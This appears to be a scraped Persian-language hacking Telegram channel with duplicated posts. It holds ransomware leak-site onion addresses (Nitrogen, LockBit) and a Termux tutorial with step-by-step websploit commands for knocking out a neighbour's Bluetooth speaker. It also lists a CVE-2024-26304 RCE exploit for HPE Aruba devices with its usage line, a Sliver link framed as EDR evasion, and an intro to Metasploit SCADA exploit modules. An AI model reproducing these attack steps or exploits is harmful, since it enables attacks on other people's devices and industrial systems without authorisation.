Industrial Control Systems Cybersecurity.pdf
1.6 MB
Industrial Control Systems Cybersecurity
@PfkSecurity
@PfkSecurity
از دوستان کسی اکانت vip tryhackme داره فقط برای 3 روز لازم دارم
اگر دارید ممنون میشم به اشتراک بگذارید :
@Aptmoqx0
اگر دارید ممنون میشم به اشتراک بگذارید :
@Aptmoqx0
امروز سالگرد تاجگذاری شاهنشاه داریوش بزرگ هخامنشی هست
خداوند این کشور را از دشمن، از خشکسالی و دروغ محفوظ دارد.
@PfkSecurity
خداوند این کشور را از دشمن، از خشکسالی و دروغ محفوظ دارد.
@PfkSecurity
🚨گروه باج افزار جدید: نیتروژن : Nitrogen
nitrogenczslprh3xyw6lh5xyjvmsz7ciljoqxxknd7uymkfetfhgvqd.onion
@PfkSecurity
nitrogenczslprh3xyw6lh5xyjvmsz7ciljoqxxknd7uymkfetfhgvqd.onion
@PfkSecurity
💡بعضی از شما پرسیدهاید که URL برای دیدن آخرین نسخههای درام Evil Corp و LockBit چیست:
lockbitapt2d73krlbewgv27tquljgxr33xbwwsp6rkyieto7u4ncead.onion
@PfkSecurity
lockbitapt2d73krlbewgv27tquljgxr33xbwwsp6rkyieto7u4ncead.onion
@PfkSecurity
This media is not supported in your browser
VIEW IN TELEGRAM
💡دیداس چگونه کار می کند اما نگاهی سه بعدی ...
@PfkSecurity
@PfkSecurity
سلام به همه، امروز در مورد یکی دیگر از کاربردهای جالب termux در گوشی هوشمندتان به شما خواهم گفت.
بیایید موقعیتی را تصور کنیم که در آن همسایگان نمک نخورده و ناکافی شما تصمیم گرفتند در شب موسیقی را از بلندگو/مرکز موسیقی بلوتوث خود پخش کنند. شرایط متفاوت است، اما اگر واقعا مردم شروع به گستاخی می کنند، پس من این راه حل را پیشنهاد می کنم
Termux را باز کنید و این دستورات را بنویسید:
apt install python3
pip install scapy
git clone https://github.com/The404Hacking/websploit
cd websploit
chmod 777 * websploit.py
python3 websploit.py
بعد، هر اسکنر بلوتوثی را باز کنید و آدرس دستگاه مورد نیاز خود را با نام پیدا کنید
سپس این دستورات را وارد کنید:
use bluetooth/bluetooth_pod
set bdaddr xx:xx:xx:xx:xx:xx
در اینجا xx را با آدرس دستگاه مورد نظر جایگزین کنید.
و وارد شوید - run
اکنون می توانید با آرامش در سکوت به رختخواب بروید.
@PfkSecurity
بیایید موقعیتی را تصور کنیم که در آن همسایگان نمک نخورده و ناکافی شما تصمیم گرفتند در شب موسیقی را از بلندگو/مرکز موسیقی بلوتوث خود پخش کنند. شرایط متفاوت است، اما اگر واقعا مردم شروع به گستاخی می کنند، پس من این راه حل را پیشنهاد می کنم
Termux را باز کنید و این دستورات را بنویسید:
apt install python3
pip install scapy
git clone https://github.com/The404Hacking/websploit
cd websploit
chmod 777 * websploit.py
python3 websploit.py
بعد، هر اسکنر بلوتوثی را باز کنید و آدرس دستگاه مورد نیاز خود را با نام پیدا کنید
سپس این دستورات را وارد کنید:
use bluetooth/bluetooth_pod
set bdaddr xx:xx:xx:xx:xx:xx
در اینجا xx را با آدرس دستگاه مورد نظر جایگزین کنید.
و وارد شوید - run
اکنون می توانید با آرامش در سکوت به رختخواب بروید.
@PfkSecurity
GitHub
GitHub - The404Hacking/websploit: Websploit is an advanced MITM framework.
Websploit is an advanced MITM framework. Contribute to The404Hacking/websploit development by creating an account on GitHub.
CVE-2024-26304.py
4.3 KB
CVE-2024-26304 RCE-exploit
HPE Aruba Device
usage:
@PfkSecurity
HPE Aruba Device
usage:
python3 CVE-2024-26304.py -u https://127.0.0.1
@PfkSecurity
شورای استانداردهای امنیتی PCI (PCI SSC) راهنمای محدوده و بخش بندی خود را برای معماری های شبکه مدرن به روز کرده است.💪
با توجه به اینکه نسخه قبلی در سال 2017 منتشر شد (در صورت استفاده از حافظه) یک به روز رسانی بسیار خوب و مفید است. در طول این مدت، فناوریها و شیوههایی مانند میکروسرویسها، چند ابری، میکروسگمنتیشن و معماری اعتماد صفر گسترده شدهاند، که البته مستلزم نیاز به توسعه توصیههایی برای طراحی و پیادهسازی ایمن، از جمله. و در زیرساخت های تحت پوشش الزامات PCI DSS💯
#pci #network #architecture
@PfkSecurity
با توجه به اینکه نسخه قبلی در سال 2017 منتشر شد (در صورت استفاده از حافظه) یک به روز رسانی بسیار خوب و مفید است. در طول این مدت، فناوریها و شیوههایی مانند میکروسرویسها، چند ابری، میکروسگمنتیشن و معماری اعتماد صفر گسترده شدهاند، که البته مستلزم نیاز به توسعه توصیههایی برای طراحی و پیادهسازی ایمن، از جمله. و در زیرساخت های تحت پوشش الزامات PCI DSS💯
#pci #network #architecture
@PfkSecurity
https://github.com/MythicAgents/sliver/blob/main/blog/blog.md
شما می توانید از این فرآیند چیزهای زیادی بیاموزید، به عنوان مثال، از edr اجتناب کنید و سرورهای تیم را پیوند دهید
شما می توانید از این فرآیند چیزهای زیادی بیاموزید، به عنوان مثال، از edr اجتناب کنید و سرورهای تیم را پیوند دهید
GitHub
sliver/blog/blog.md at main · MythicAgents/sliver
Sliver agents for Mythic. Contribute to MythicAgents/sliver development by creating an account on GitHub.
SCADA Hacking: Metasploit SCADA Modules
به عنوان یک پنتستر/هکر ، ما منابع زیادی داریم که میتوانیم از آنها برای آزمایش امنیت سیستم SCADA/ICS استفاده کنیم. یکی از محبوب ترین آنها فریم ورک Metasploit است.
در اینجا، من سعی کرده ام لیستی از اکثر ماژول های Metasploit که برای آزمایش/هک کردن SCADA/ICS مفید هستند را گردآوری کنم. لطفاً به خاطر داشته باشید که سایتهای SCADA/ICS از سختافزار و پروتکلهای متنوعی استفاده میکنند، بنابراین شناسایی برای یک هک موفقیتآمیز حیاتی میشود. شما باید حداقل سازنده و پروتکل را بشناسید و سپس ماژول مناسب را از این لیست بیابید.
این اطلاعات در قالب زیر سازماندهی شده است.
ابزار/Exploit MSF-Update Developer/Vendor System(های) Metasploit مرجع
من معتقدم که اکثر این ستون ها با استثناهای احتمالی MSF-Update و System(s) توضیحی هستند.
ستون MSF-Update نشان می دهد که آیا ماژول هنگام به روز رسانی در Metasploit در دسترس است یا خیر. برخی از ماژول ها به طور خودکار به روز می شوند و به Metasploit Framework شما اضافه می شوند. برخی دیگر، احتمالاً باید به صورت دستی اضافه کنید.
@pfksecurity
به عنوان یک پنتستر/هکر ، ما منابع زیادی داریم که میتوانیم از آنها برای آزمایش امنیت سیستم SCADA/ICS استفاده کنیم. یکی از محبوب ترین آنها فریم ورک Metasploit است.
در اینجا، من سعی کرده ام لیستی از اکثر ماژول های Metasploit که برای آزمایش/هک کردن SCADA/ICS مفید هستند را گردآوری کنم. لطفاً به خاطر داشته باشید که سایتهای SCADA/ICS از سختافزار و پروتکلهای متنوعی استفاده میکنند، بنابراین شناسایی برای یک هک موفقیتآمیز حیاتی میشود. شما باید حداقل سازنده و پروتکل را بشناسید و سپس ماژول مناسب را از این لیست بیابید.
این اطلاعات در قالب زیر سازماندهی شده است.
ابزار/Exploit MSF-Update Developer/Vendor System(های) Metasploit مرجع
من معتقدم که اکثر این ستون ها با استثناهای احتمالی MSF-Update و System(s) توضیحی هستند.
ستون MSF-Update نشان می دهد که آیا ماژول هنگام به روز رسانی در Metasploit در دسترس است یا خیر. برخی از ماژول ها به طور خودکار به روز می شوند و به Metasploit Framework شما اضافه می شوند. برخی دیگر، احتمالاً باید به صورت دستی اضافه کنید.
@pfksecurity
P.F.K Security
SCADA Hacking: Metasploit SCADA Modules به عنوان یک پنتستر/هکر ، ما منابع زیادی داریم که میتوانیم از آنها برای آزمایش امنیت سیستم SCADA/ICS استفاده کنیم. یکی از محبوب ترین آنها فریم ورک Metasploit است. در اینجا، من سعی کرده ام لیستی از اکثر ماژول های Metasploit…
ستون System(s) سیستم های آسیب پذیر در برابر ماژول اکسپلویت/اسکنر را نشان می دهد. یک بار دیگر می خواهم بر ماهیت متنوع سیستم های SCADA/ICS تاکید کنم.
لطفاً توجه داشته باشید که ماژولها از ماژولهای بهرهبرداری و ماژولهای کمکی (عمدتاً برای recon استفاده میشوند) متفاوت هستند.
@pfksecurity
لطفاً توجه داشته باشید که ماژولها از ماژولهای بهرهبرداری و ماژولهای کمکی (عمدتاً برای recon استفاده میشوند) متفاوت هستند.
@pfksecurity